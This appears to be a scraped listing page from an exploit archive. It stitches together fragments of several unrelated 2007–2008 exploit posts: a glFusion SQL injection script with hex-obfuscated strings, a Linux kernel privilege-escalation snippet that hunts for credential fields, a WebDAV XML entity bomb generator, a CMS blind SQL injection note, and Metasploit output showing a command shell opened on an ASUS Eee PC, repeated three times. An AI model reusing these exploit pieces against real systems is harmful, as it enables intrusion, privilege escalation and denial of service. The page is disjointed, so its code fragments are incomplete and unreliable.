New User, Welcome!     Login

i 1

glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit

        }

        function xtrct_tpc($_h){
            $_x=explode("\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x74\x6f\x70\x69\x63\x3d",$_h);
            $_y=array();
            for ($i=1; $i<count($_x); $i++){
                $_tmp=explode("\x22",$_x[$i]);
                if ((!in_array($_tmp[0],$_y)) and ($_tmp[0]<>'')) {
                    $_y[$i]=$_tmp[0];
                }
            }

Crash in LIVE555 Media Server 2007.11.01

  for (i = 0; i < resultCmdNameMaxSize-1 && i < reqStrSize; ++i) {

    ...

  // Skip over the prefix of any "rtsp://" or "rtsp:/" URL that follows:
  unsigned j = i+1;
  while (j < reqStrSize && (reqStr[j] == ' ' || reqStr[j] == '\t')) ++j;
  for (j = i+1; j < reqStrSize-8; ++j) {
    ...

Re: COSEINC Linux Advisory #2: IA32 System Call Emulation Vulnerability

        uint8_t *gs;
        uint32_t *ptr;

        asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs));

        for (i = 200; i < 1000; i+=1) {

                ptr = (uint32_t*) (gs + i);

                if ((ptr[0] == uid) && (ptr[1] == euid)
                        && (ptr[2] == suid) && (ptr[3] == uid)) {

RE: ASUS Eee PC rooted out of the box

12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
GNU/Linux

The father of all bombs - another webdav fiasco

 print "No PROPFIND on this server and path.\n";
 exit(0);       
}

$a = "";
for ($i=1;$i<256;$i++) {             # Here you can increase the XML bomb count
        $k = $i-1;
        $a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"
}

$igzml =

WysGui CMS 1.2 BETA(Insecure Cookie Handling)--Blind-sql-injection-exploit-->

#Path --> [HOME_PATH]/modules/body_mods/admin_panel/settings.php
#
#It contents:
#                               ...
#                               
#                               if( $i>1 ){
#                                       $order.= ' `page` = "'.$admin_pages[$i].'",';
#                               }
#                               ...
#
#                               $allPages_select = 'SELECT * FROM `pagedata`

ASUS Eee PC rooted out of the box

12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
GNU/Linux

Re: RE: ASUS Eee PC rooted out of the box

> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Calling the vulnerable function...
> [+] Server did not respond, this is expected
> [*] Command shell session 1 opened (192.168.50.201:33694 ->
> 192.168.50.10:4444)
> msf exploit(lsa_transnames_heap) > sessions -i 1
> [*] Starting interaction with 1...
> 
> uname -a
> Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> GNU/Linux


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!